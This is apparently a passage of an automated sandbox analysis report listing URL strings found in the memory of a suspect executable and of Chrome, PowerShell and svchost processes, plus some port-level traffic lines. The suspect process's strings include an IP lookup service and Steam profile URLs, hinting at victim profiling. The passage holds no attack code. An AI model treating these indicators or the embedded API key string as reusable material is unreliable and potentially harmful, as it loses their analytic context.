                      Source: a.exe, 0000000B.00000002.1787672422.0000000003583000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003598000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003546000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000356E000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000355A000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000358D000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003575000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000354C000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/cpprestsdk)
                      Source: powershell.exe, 00000001.00000002.1170870168.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: a.exe, 0000000B.00000002.1787672422.0000000003583000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003598000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003546000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000356E000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000355A000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000358D000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003575000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.000000000354C000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1787672422.0000000003564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/open-source-parsers/jsoncpp.git)
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                      Source: chrome.exe, 0000000C.00000002.1518094546.00003D3C00074000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1517929251.00003D3C00004000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: chrome.exe, 0000000C.00000002.1521902815.00003D3C00864000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                      Source: chrome.exe, 0000000C.00000003.1425167522.00003D3C01B44000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1513482076.0000021F27775000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1487750911.0000020D463C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://icanhazip.com/
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525459772.00003D3C00D50000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524430069.00003D3C00B84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                      Source: chrome.exe, 0000000C.00000003.1424062885.00003D3C004B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1394323838.00003D3C014F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/gen204
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529975858.00003D3C017A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/:
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/J
                      Source: chrome.exe, 0000000C.00000002.1532032472.00003D3C01A70000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/chat/download?usp=chrome_default
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530801030.00003D3C018F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                      Source: chrome.exe, 0000000C.00000002.1529698334.00003D3C016F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&am
                      Source: chrome.exe, 0000000C.00000002.1529698334.00003D3C016F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&am;ogbl
                      Source: chrome.exe, 0000000C.00000002.1529698334.00003D3C016F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530801030.00003D3C018F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1531018690.00003D3C01950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                      Source: chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultandler
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1523468073.00003D3C00A48000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524666430.00003D3C00BD8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522696557.00003D3C00994000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525018522.00003D3C00C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522696557.00003D3C00994000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525018522.00003D3C00C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email?utm_source=chrome2B
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522696557.00003D3C00994000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525018522.00003D3C00C74000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmp, chrome.exe, 0000000C.00000002.1524852766.00003D3C00C1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                      Source: powershell.exe, 00000001.00000002.1173728731.0000000005788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                      Source: chrome.exe, 0000000C.00000002.1529061146.00003D3C01474000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30B42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                      Source: svchost.exe, 00000004.00000003.1203087127.000001FE30AD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                      Source: chrome.exe, 0000000C.00000002.1507872503.0000021F24397000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetModels?key=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                      Source: chrome.exe, 0000000C.00000003.1423946714.00003D3C014D8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1424062885.00003D3C004B4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000003.1394323838.00003D3C014F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/calendar/
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://passwords.google.comSaved
                      Source: chrome.exe, 0000000C.00000002.1522099250.00003D3C008D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://passwords.google/
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://people.googleapis.com/
                      Source: chrome.exe, 0000000C.00000002.1508044068.0000021F24437000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmp, chrome.exe, 0000000C.00000002.1524852766.00003D3C00C1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                      Source: chrome.exe, 0000000C.00000002.1521239934.00003D3C006D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                      Source: chrome.exe, 0000000C.00000002.1521239934.00003D3C006D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                      Source: chrome.exe, 0000000C.00000002.1518860266.00003D3C001D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                      Source: chrome.exe, 0000000C.00000002.1518860266.00003D3C001D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyA2KlwBX3mkFo30om9LU
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comb
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525459772.00003D3C00D50000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524430069.00003D3C00B84000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                      Source: chrome.exe, 0000000C.00000002.1529698334.00003D3C016F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                      Source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: a.exe, 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1513482076.0000021F27775000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1487750911.0000020D463C5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6098869
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://support.google.com/chrome/answer/96817
                      Source: chrome.exe, 0000000C.00000002.1520721013.00003D3C00528000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://support.google.com/chromebook?p=app_intent
                      Source: chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                      Source: chrome.exe, 0000000C.00000002.1526280757.00003D3C00F1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: chrome.exe, 0000000C.00000002.1526280757.00003D3C00F1C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/Terms
                      Source: chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1518749749.00003D3C001B6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v10
                      Source: chrome.exe, 0000000C.00000002.1527164269.00003D3C01100000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525459772.00003D3C00D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                      Source: chrome.exe, 0000000C.00000002.1525459772.00003D3C00D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=searchTerms
                      Source: chrome.exe, 0000000C.00000002.1527662934.00003D3C011C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525575611.00003D3C00DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                      Source: chrome.exe, 0000000C.00000003.1394678544.00003D3C01554000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-GB&async=fixed:0
                      Source: chrome.exe, 0000000C.00000002.1519041638.00003D3C00204000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                      Source: chrome.exe, 0000000C.00000002.1522099250.00003D3C008D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/#safe
                      Source: chrome.exe, 0000000C.00000002.1522167235.00003D3C008F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
                      Source: chrome.exe, 0000000C.00000002.1522167235.00003D3C008F8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                      Source: chrome.exe, 0000000C.00000002.1499108700.0000021F212C0000.00000002.00000001.00040000.00000015.sdmpString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524430069.00003D3C00B84000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1525069779.00003D3C00C94000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                      Source: chrome.exe, 0000000C.00000002.1507872503.0000021F24397000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
                      Source: chrome.exe, 0000000C.00000003.1395454433.00003D3C00464000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1522792090.00003D3C009C4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1524037960.00003D3C00ADC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521442004.00003D3C00750000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1520721013.00003D3C00528000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: chrome.exe, 0000000C.00000002.1524037960.00003D3C00ADC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.icoe
                      Source: chrome.exe, 0000000C.00000002.1529698334.00003D3C016F8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en-GB&amp;tab=ri&amp;ogbl
                      Source: chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-GB/about/products?tab=rh
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                      Source: chrome.exe, 0000000C.00000002.1519452454.00003D3C00334000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                      Source: chrome.exe, 0000000C.00000003.1425925273.00003D3C01B68000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                      Source: chrome.exe, 0000000C.00000002.1518966015.00003D3C001E4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                      Source: chrome.exe, 0000000C.00000002.1527314161.00003D3C01160000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                      Source: chrome.exe, 0000000C.00000002.1533903414.00003D3C01E7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                      Source: chrome.exe, 0000000C.00000002.1534385770.00003D3C01EF0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534115636.00003D3C01EA4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529590373.00003D3C016A4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1533851715.00003D3C01E40000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1533903414.00003D3C01E7C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1518621958.00003D3C00170000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1532933991.00003D3C01B58000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1526370838.00003D3C00F54000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.WcyoQrvsWY0.2019.O/rt=j/m=q_dnp
                      Source: chrome.exe, 0000000C.00000002.1529217118.00003D3C01564000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529217118.00003D3C01554000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1534322817.00003D3C01ED4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528236893.00003D3C012B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.L8bgMGq1rcI.L.W.O/m=qmd
                      Source: a.exe, 0000000B.00000002.1787672422.00000000032C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: chrome.exe, 0000000C.00000002.1529975858.00003D3C017A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                      Source: chrome.exe, 0000000C.00000002.1530662833.00003D3C018C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1529975858.00003D3C017A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530017820.00003D3C017C8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                      Source: chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                      Source: chrome.exe, 0000000C.00000002.1529821274.00003D3C01740000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1521498065.00003D3C00794000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1528655501.00003D3C013BC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000C.00000002.1530713106.00003D3C018DC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                      Source: chrome.exe, 0000000C.00000002.1528655501.00003D3C013BC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlb
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
